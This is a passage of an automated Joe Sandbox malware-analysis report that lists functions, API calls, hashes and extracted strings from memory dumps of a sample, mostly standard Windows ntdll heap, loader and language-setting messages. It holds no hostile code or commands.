                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9d818a1eb94441588e1bcdc7ed2bdd2e64c3d15017c9df31bca0029b1348ad53
                                                                                                          • Instruction ID: 762d5257bd6841bd00a157e1496dbd9d2d388ba292e4ef7c2d63011cc9fa4222
                                                                                                          • Opcode Fuzzy Hash: 9d818a1eb94441588e1bcdc7ed2bdd2e64c3d15017c9df31bca0029b1348ad53
                                                                                                          • Instruction Fuzzy Hash: 1CE09270E0450EBBEF51CF85EC41FA8BBB5EB55358F008291E919A6180F272EA85CB91
                                                                                                          Function 00E1C853 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 82 e1c853-e1c88c call df4873 call e1d6b3 ExitProcess
                                                                                                          APIs
                                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,58649064,?,?,58649064), ref: 00E1C887
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ExitProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 621844428-0
                                                                                                          • Opcode ID: adef65bbb13c132bae0e59a0c263315a5c1748308e9f93dab41bc55e43cd02af
                                                                                                          • Instruction ID: 0cc4bb1bc1640d7bc3e784dd364e6f69f13a2f10059cd4b465be1f2b50cc8f67
                                                                                                          • Opcode Fuzzy Hash: adef65bbb13c132bae0e59a0c263315a5c1748308e9f93dab41bc55e43cd02af
                                                                                                          • Instruction Fuzzy Hash: CFE046362046087BC220FAA9DC41FDB77ACEBC5760F108419FA08A7241D6B0B9008AF4
                                                                                                          Function 01062C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 87 1062c0a-1062c0f 88 1062c11-1062c18 87->88 89 1062c1f-1062c26 LdrInitializeThunk 87->89
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 9e5cc55507b1157876a543b7e3c9a2d89386f9cfb28d1e51f618555ed6249088
                                                                                                          • Instruction ID: 6d86120faf6238cbd15f4ffa2c51dc0128570c90c2310e7c6eb345e307dead2b
                                                                                                          • Opcode Fuzzy Hash: 9e5cc55507b1157876a543b7e3c9a2d89386f9cfb28d1e51f618555ed6249088
                                                                                                          • Instruction Fuzzy Hash: 62B09B71D015C5D9EA51F764460C717794477D0711F15C072D2430641F4738C1D1E275

                                                                                                          Non-executed Functions

                                                                                                          Function 010D8D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 010D8DD3
                                                                                                          • This failed because of error %Ix., xrefs: 010D8EF6
                                                                                                          • <unknown>, xrefs: 010D8D2E, 010D8D81, 010D8E00, 010D8E49, 010D8EC7, 010D8F3E
                                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 010D8F26
                                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010D8E3F
                                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010D8E86
                                                                                                          • a NULL pointer, xrefs: 010D8F90
                                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 010D8DB5
                                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 010D8F2D
                                                                                                          • *** then kb to get the faulting stack, xrefs: 010D8FCC
                                                                                                          • The resource is owned exclusively by thread %p, xrefs: 010D8E24
                                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 010D8DA3
                                                                                                          • The instruction at %p tried to %s , xrefs: 010D8F66
                                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 010D8F3F
                                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 010D8FEF
                                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 010D8DC4
                                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 010D8D8C
                                                                                                          • *** enter .exr %p for the exception record, xrefs: 010D8FA1
                                                                                                          • The resource is owned shared by %d threads, xrefs: 010D8E2E
                                                                                                          • Go determine why that thread has not released the critical section., xrefs: 010D8E75
                                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 010D8E4B
                                                                                                          • an invalid address, %p, xrefs: 010D8F7F
                                                                                                          • write to, xrefs: 010D8F56
                                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 010D8E02
                                                                                                          • The instruction at %p referenced memory at %p., xrefs: 010D8EE2
                                                                                                          • read from, xrefs: 010D8F5D, 010D8F62
                                                                                                          • *** Inpage error in %ws:%s, xrefs: 010D8EC8
                                                                                                          • The critical section is owned by thread %p., xrefs: 010D8E69
                                                                                                          • *** enter .cxr %p for the context, xrefs: 010D8FBD
                                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 010D8F34
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                          • API String ID: 0-108210295
                                                                                                          • Opcode ID: 85ce4e380bfd21a7e5505efe6003ce4ef75ea0f99e91dd2da2eef1fb46a34022
                                                                                                          • Instruction ID: 27b9ddb8be2468626b3c606c798d8a880564a3337803dc87bdf89421ba02e98b
                                                                                                          • Opcode Fuzzy Hash: 85ce4e380bfd21a7e5505efe6003ce4ef75ea0f99e91dd2da2eef1fb46a34022
                                                                                                          • Instruction Fuzzy Hash: F0812879A00301BFDB11AB99DC85EAF3F75EF56B24F414089F2886F156E3B98411CB61
                                                                                                          Function 010A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-2160512332
                                                                                                          • Opcode ID: d07e209544990a6feb6244f06045e575e44633dc3ad8757324daed45e12dc58e
                                                                                                          • Instruction ID: 0f37944a6b213c8097ab369cacbaee5216e94f0ce7ac815144fd9621f17b1a37
                                                                                                          • Opcode Fuzzy Hash: d07e209544990a6feb6244f06045e575e44633dc3ad8757324daed45e12dc58e
                                                                                                          • Instruction Fuzzy Hash: 54929071604342AFE725DFA8C880BABB7E8BB84754F44492DFAD4DB251D770E844CB92
                                                                                                          Function 010168B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-3089669407
                                                                                                          • Opcode ID: eb79c39ae1e4b9c4ef6337d2428e3dc46f9e6b1a6437b437e6a6129c8118a60e
                                                                                                          • Instruction ID: 1c9d27e397c6276a19730ebe33649e8889593b9475a698ca4fa86906d8a99e49
                                                                                                          • Opcode Fuzzy Hash: eb79c39ae1e4b9c4ef6337d2428e3dc46f9e6b1a6437b437e6a6129c8118a60e
                                                                                                          • Instruction Fuzzy Hash: 998171B2D01209BF9B11EAE4DED0EEFB7BEEB44750B444422BA50F7114E321ED448BA1
                                                                                                          Function 010C5910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 010C5A84
                                                                                                          • InstallLanguageFallback, xrefs: 010C6050
                                                                                                          • @, xrefs: 010C6027
                                                                                                          • @, xrefs: 010C63A0
                                                                                                          • PreferredUILanguagesPending, xrefs: 010C61D2
                                                                                                          • LanguageConfiguration, xrefs: 010C6420
                                                                                                          • Control Panel\Desktop, xrefs: 010C615E
                                                                                                          • @, xrefs: 010C61B0
                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 010C5FE1
                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010C635D
                                                                                                          • PreferredUILanguages, xrefs: 010C63D1
                                                                                                          • LanguageConfigurationPending, xrefs: 010C6221
                                                                                                          • @, xrefs: 010C6277
                                                                                                          • @, xrefs: 010C647A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                          • API String ID: 0-1325123933
                                                                                                          • Opcode ID: e3b6102d938dddf72b8837f98939c9026a1f1c8f409074ca77f6d323e393c37a
                                                                                                          • Instruction ID: 359cf3e854a00b4fc668a3d30d60e8c0d9fdc4aba7e83226cf8d6fee21e744f7
                                                                                                          • Opcode Fuzzy Hash: e3b6102d938dddf72b8837f98939c9026a1f1c8f409074ca77f6d323e393c37a
                                                                                                          • Instruction Fuzzy Hash: 4E7248756083419BD365DF29C880BAFBBE9BB88B00F44492DFAC597250E771E9058F92
                                                                                                          Function 01058620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01095543
                                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010954CE
                                                                                                          • undeleted critical section in freed memory, xrefs: 0109542B
                                                                                                          • corrupted critical section, xrefs: 010954C2
                                                                                                          • Invalid debug info address of this critical section, xrefs: 010954B6
                                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010954E2
                                                                                                          • double initialized or corrupted critical section, xrefs: 01095508
                                                                                                          • Critical section address, xrefs: 01095425, 010954BC, 01095534
                                                                                                          • Address of the debug info found in the active list., xrefs: 010954AE, 010954FA
                                                                                                          • Thread identifier, xrefs: 0109553A
                                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0109540A, 01095496, 01095519
                                                                                                          • 8, xrefs: 010952E3
                                                                                                          • Critical section address., xrefs: 01095502
                                                                                                          • Critical section debug info address, xrefs: 0109541F, 0109552E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                          • API String ID: 0-2368682639
                                                                                                          • Opcode ID: ce2b598a7226a1b5e0a5efb53ebc18ba78a930daf07d5981581c57827dac8131
                                                                                                          • Instruction ID: 6acf01c462c07611f28d02c94d90823cf5eb87e9b81bc68c1c7506ee10d7aad7
                                                                                                          • Opcode Fuzzy Hash: ce2b598a7226a1b5e0a5efb53ebc18ba78a930daf07d5981581c57827dac8131
                                                                                                          • Instruction Fuzzy Hash: CF818E70A00349AFEF61CF9ACC51BAEBBF5BB48714F10805AF584BB291D775A940CB60
                                                                                                          Function 010529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01092409
                                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010924C0
                                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0109261F
                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01092624
                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01092506
                                                                                                          • @, xrefs: 0109259B
                                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01092498
                                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01092602
                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010925EB
                                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01092412
                                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010922E4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                          • API String ID: 0-4009184096
                                                                                                          • Opcode ID: 74f664b5a084485399af150c445b325546147e2439f7cc8b2d83e0818233e22d
                                                                                                          • Instruction ID: 2a026b337fefd6a3f0da2bfbd41568e7fbe1326139ef79911391d80413cb9551
                                                                                                          • Opcode Fuzzy Hash: 74f664b5a084485399af150c445b325546147e2439f7cc8b2d83e0818233e22d
                                                                                                          • Instruction Fuzzy Hash: 390262F1D002299BDF61DB54CC90BDEB7B8AF54304F4441DAEA89A7242DB70AE84CF59
                                                                                                          Function 01050F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                          • API String ID: 0-360209818
                                                                                                          • Opcode ID: 156236c7a7adb18f48627d0a95e806c3db5288793c916c21a49e6e4ad19aea7e
                                                                                                          • Instruction ID: 48ba6325067ae241da56f4b51849068681c3be5b6eb9b4ba9757116e9f7786df
                                                                                                          • Opcode Fuzzy Hash: 156236c7a7adb18f48627d0a95e806c3db5288793c916c21a49e6e4ad19aea7e
                                                                                                          • Instruction Fuzzy Hash: 9C6291B5E002268FDF64CF18C8507ADB7B6BF85320F5581DAE989AB240D7725AE1DF40
                                                                                                          Function 010C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                          • API String ID: 0-2515994595
                                                                                                          • Opcode ID: 6ec33f9114063e443b85cb02dba9fcc157d8398621954a1863de6fec96b709f7
                                                                                                          • Instruction ID: 6daf6dd4d848607f47a46c065e4279d9356f2ccb555071e455425b565e5044d9
                                                                                                          • Opcode Fuzzy Hash: 6ec33f9114063e443b85cb02dba9fcc157d8398621954a1863de6fec96b709f7
                                                                                                          • Instruction Fuzzy Hash: 7A51E0711183099BC325EF188888BAFBBECEF94B50F14891EEAD9C3251E770D504CB96
                                                                                                          Function 010D12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                          • API String ID: 0-3591852110
                                                                                                          • Opcode ID: 50f9484d8e8bea0536afb369b0de610e4f580004bbc77a5efe09f30a9c7204c2
                                                                                                          • Instruction ID: 62bf38ffc74d7797de655bf22c54dc83710086e55e29fad33742ae73b75194da
                                                                                                          • Opcode Fuzzy Hash: 50f9484d8e8bea0536afb369b0de610e4f580004bbc77a5efe09f30a9c7204c2
                                                                                                          • Instruction Fuzzy Hash: 85127A34604746DFE7258F68C445BBABBF2FF09714F188499E5C68B692DB38E881CB50
                                                                                                          Function 0103AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                          • API String ID: 0-3197712848
                                                                                                          • Opcode ID: 15f404ba7d45627a6b5310ffd59c0328c7dad137c194fe6532810e44f3ac1d4f
                                                                                                          • Instruction ID: ebe49b414d47bf2fa101921351e0c06c65fcfc666efde823436d9876ed918f23
                                                                                                          • Opcode Fuzzy Hash: 15f404ba7d45627a6b5310ffd59c0328c7dad137c194fe6532810e44f3ac1d4f
                                                                                                          • Instruction Fuzzy Hash: 9212EF71A08342CFD765DB28C480BAAB7E9BFC4708F44496EF9C58B291E774D944CB92
                                                                                                          Function 0101D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                          • API String ID: 0-3532704233
                                                                                                          • Opcode ID: d579f0a45847873a32c7a98e51ffbf35fd1734ae5f207567797edd87e1955cbf
                                                                                                          • Instruction ID: 4c11c6d8f17d9abb96a0525feb3ecbc05154a5c36966436ea220b9d33f783f6f
                                                                                                          • Opcode Fuzzy Hash: d579f0a45847873a32c7a98e51ffbf35fd1734ae5f207567797edd87e1955cbf
                                                                                                          • Instruction Fuzzy Hash: 24B1BA729083169FC761CF68C884AAFBBE8AF88744F05496EF9C8D7204D734D944CB92
                                                                                                          Function 010D0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                          • API String ID: 0-1357697941
                                                                                                          • Opcode ID: 51c80a8b30eaf2d98bed21ee2ee06998ec7141fbd4d743c3d28eb98e061dda1a
                                                                                                          • Instruction ID: 4efe2c5b4a0b748745631f51059a6f299029fc5c14d14afc5ab12a6ff451d3ba
                                                                                                          • Opcode Fuzzy Hash: 51c80a8b30eaf2d98bed21ee2ee06998ec7141fbd4d743c3d28eb98e061dda1a
                                                                                                          • Instruction Fuzzy Hash: A6F1F131A00746EFDB25DF68C480BEABBF5FF09710F088099E6C59B696CB74A945CB50
                                                                                                          Function 010D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                          • API String ID: 0-1700792311
                                                                                                          • Opcode ID: 308dd5c70872d608b28b1c8ef77f584937f4973faeecd437c9270b94dc304b91
                                                                                                          • Instruction ID: c62e051e68cabfcc2e66917dcf7b7a1ffd0cc6b093b3adf73b0a1eff7970f779
                                                                                                          • Opcode Fuzzy Hash: 308dd5c70872d608b28b1c8ef77f584937f4973faeecd437c9270b94dc304b91
                                                                                                          • Instruction Fuzzy Hash: 56D1CE35600786DFDB66DF68C440AAEBBF1FF49B10F088099F5899B65ACB34D981CB14
                                                                                                          Function 010A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 010A8A67
                                                                                                          • VerifierDlls, xrefs: 010A8CBD
                                                                                                          • HandleTraces, xrefs: 010A8C8F
                                                                                                          • VerifierDebug, xrefs: 010A8CA5
                                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 010A8B8F
                                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 010A8A3D
                                                                                                          • VerifierFlags, xrefs: 010A8C50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
